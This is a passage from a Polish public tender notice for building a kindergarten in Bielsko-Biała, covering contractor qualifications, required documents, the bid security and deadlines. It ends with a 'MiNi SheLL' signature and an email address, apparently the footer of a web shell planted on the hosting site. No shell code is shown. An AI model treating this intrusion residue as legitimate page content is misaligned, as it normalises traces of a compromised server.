rozbiórce budynku lub obiektu inżynierskiego, o wartości robót co najmniej 100 000 zł brutto. Roboty te winny być wykonane należycie.<br/>3) Wykonawca musi wykazać, że dysponuje osobami, które będą skierowane przez Wykonawcę do realizacji niniejszego zamówienia publicznego, posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (do kierowania robotami), w szczególności:<br/>- kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, posiadającym co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika robót lub<br/>kierownika budowy po uzyskaniu w/w uprawnień;<br/>- kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów oraz<br/>posiadającego co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika robót sanitarnych po uzyskaniu w/w uprawnień;<br/>- kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia budowlane wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz posiadającego co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika robót elektrycznych po uzyskaniu w/w uprawnień. Zamawiający nie dopuszcza możliwości posiadania kilku uprawnień, o których mowa powyżej, przez jedną osobę.<br/>UWAGA:<br/>• Jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty budowlane zostały wykonane należycie jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie robót budowlanych podać wartość robót odpowiadających zakresowi warunku.<br/>• W przypadku robót, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP jest na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych (w przypadku<br/>robót rozliczanych wyłącznie w walutach innych niż PLN).<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>a) Wykaz robót budowlanych (w formie elektronicznej lub postaci elektronicznej) wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone – wg wzoru stanowiącego Załącznik nr 5a do nin. SWZ;<br/>b) Dowody potwierdzające, że roboty budowlane wymienione w ww. wykazie (zgodnie z lit. a) zostały<br/>wykonane należycie, w szczególności informacje o tym, czy roboty zostały wykonane zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończone. Dowodami są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty te zostały<br/>wykonane,<br/>- inne dokumenty – jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać dokumentów, o których mowa powyżej;<br/>Uwaga: Jeżeli zakres i wartość robót przedstawionych w dowodach złożonych na potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i<br/>prawidłowo ukończone, o których mowa w lit. b, jest szerszy od wymaganego przez zamawiającego, należy w Wykazie robót budowlanych, o którym mowa w lit. a, podać zakres i wartość zrealizowanych robót odpowiadających zakresowi warunku.<br/>Uwaga: Jeżeli wykaz, oświadczenia lub inne złożone przez wykonawcę dokumenty budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty<br/>budowlane były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.<br/>c) Wykaz osób (w formie elektronicznej lub postaci elektronicznej), skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę<br/>jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacjizawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – wg wzoru stanowiącego Załącznik nr 5b do nin. SWZ;<br/>Uwaga: Wzór Wykazu robót budowlanych, stanowiący Załącznik nr 5a do nin. SWZ oraz wzór Wykazu osób, stanowiący Załącznik nr 5b do nin. SWZ, zostaną przekazane wykonawcy, którego oferta została najwyżej oceniona, w postaci elektronicznej, wraz z wezwaniem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oferta przetargowa sporządzona na formularzu Oferta, stanowiącym Załącznik nr 1 do nin. SWZ, zawierająca m.in.:g) Oświadczenie wykonawcy o:- zdobyciu informacji koniecznych do sporządzenia oferty,- zapoznaniu się z warunkami postępowania o udzielenie zamówienia<br/>publicznego, określonymi w SWZ wraz z załącznikami i przyjęciu tych warunków bez zastrzeżeń,- zobowiązaniu się do zawarcia umowy, na warunkach określonych we wzorze umowy (Załącznik nr 6 do nin. SWZ),- zobowiązaniu się w terminie do 7 dni od daty zawarcia umowy dostarczyć zamawiającemu szczegółowy harmonogram terminowo-rzeczowo-finansowy<br/>realizacji robót budowlanych objętych umową, o którym mowa we wzorze umowy (Załącznik nr 6 do nin. SWZ),- zobowiązaniu się oraz zobowiązaniu podwykonawców do zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane przez zamawiającego czynności w<br/>zakresie realizacji zamówienia, tj. czynności będące robotami budowlanymi w miejscu wykonywania przedmiotu zamówienia, w zakresie określonym w nin. SWZ, przez cały okres realizacji przedmiotu zamówienia, z wyłączeniem kadry kierowniczej. Szczegółowe informacje<br/>dotyczące zobowiązania zatrudnienia osób na umowę o pracę zostały określone w nin. SWZ oraz we wzorze umowy (Załącznik nr 5 do nin. SWZ);h) Informację o zamiarze powierzenia wykonania części zamówienia podwykonawcom i) Informację o zastosowaniu materiałów i urządzeń równoważnych, lub/oraz rozwiązań równoważnych – 2) Kosztorys ofertowy (w formie<br/>elektronicznej lub postaci elektronicznej), sporządzony w oparciu o przedmiary robót i dokumentację projektową, stanowiące Załączniki nr 4 i 8 do nin. SWZ, wykonany metodą uproszczoną, polegającą na obliczeniu wartości kosztorysowej robót objętych przedmiarami robót, jako sumy iloczynów ilości jednostek przedmiarowych robót i ich cen jednostkowych bez<br/>podatku VAT, zawierający co najmniej: opis pozycji, ilość robót wraz z jednostką, cenę jednostkową dla każdej pozycji kosztorysowej, wartość pozycji oraz cenę ogółem, obejmujący wycenę poszczególnych elementów zamówienia z wyszczególnieniem składników ceny (w szczególności rg, kp, zysk). Ceny jednostkowe pozycji kosztorysowych (netto) mają zawierać<br/>robociznę, materiał z kosztami zakupu, sprzęt, koszty pośrednie i zysk. Obowiązującą stawkę podatku VAT należy doliczyć do wartości kosztorysowej (sumy) robót, chyba że wykonawca nie jest płatnikiem VAT.3) Dokumenty dotyczące oferowanych materiałów i urządzeń równoważnych, lub/oraz rozwiązań równoważnych, np. karty techniczne, karty katalogowe producenta, wymagane przepisami prawa certyfikaty, inne dokumenty, 4) Oświadczenie<br/>wykonawcy dotyczące wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (w formie elektronicznej lub postaci elektronicznej) – będzie ono stanowić załącznik do oferty – wg wzoru stanowiącego Załącznik nr 1a do nin. SWZ.5) Potwierdzenie wniesienia<br/>wadium.6) Pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie (konsorcjum, spółka cywilna) o przedmiotowe zamówienie (w formie elektronicznej lub postaci elektronicznej), 7) Upoważnienie (pełnomocnictwo) do podpisania oferty (w formie elektronicznej lub postaci elektronicznej), załączone do oferty, o ile nie wynika ono z dokumentów rejestrowych<br/>wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>130.000,00 zł (słownie: stu trzydziestu tysięcy 00/100 złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez zamawiającego (wyłącza się możliwość wniesienia zabezpieczenia w gotówce), tj. Bank PeKaO S. A. Oddział w Bielsku-Białej, ul. ks. Stanisława Stojałowskiego 23, nr 25 1240 4142 1111 0000 4822 9638, podając w tytule: „Wadium do przetargu nieograniczonego pn.<br/>Budowa przedszkola przy ul. Janowickiej i ul. Jakuba Jasińskiego w Bielsku-Białej.<br/>Uwaga: Przy wnoszeniu zabezpieczenia przelewem dokument polecenia dokonania przelewu nie jest dowodem wniesienia zabezpieczenia. Potwierdzeniem dokonania wpłaty zabezpieczenia jest uznanie kwotą zabezpieczenia rachunku bankowego zamawiającego (wpływ środków na rachunek bankowy zamawiającego). Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej, pl. Ratuszowy 1, 43-300 Bielsko-Biała<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p.<br/>8. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają na formularzu OFERTA oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z par. 20 wzoru umowy stanowiącym załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://um-bielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com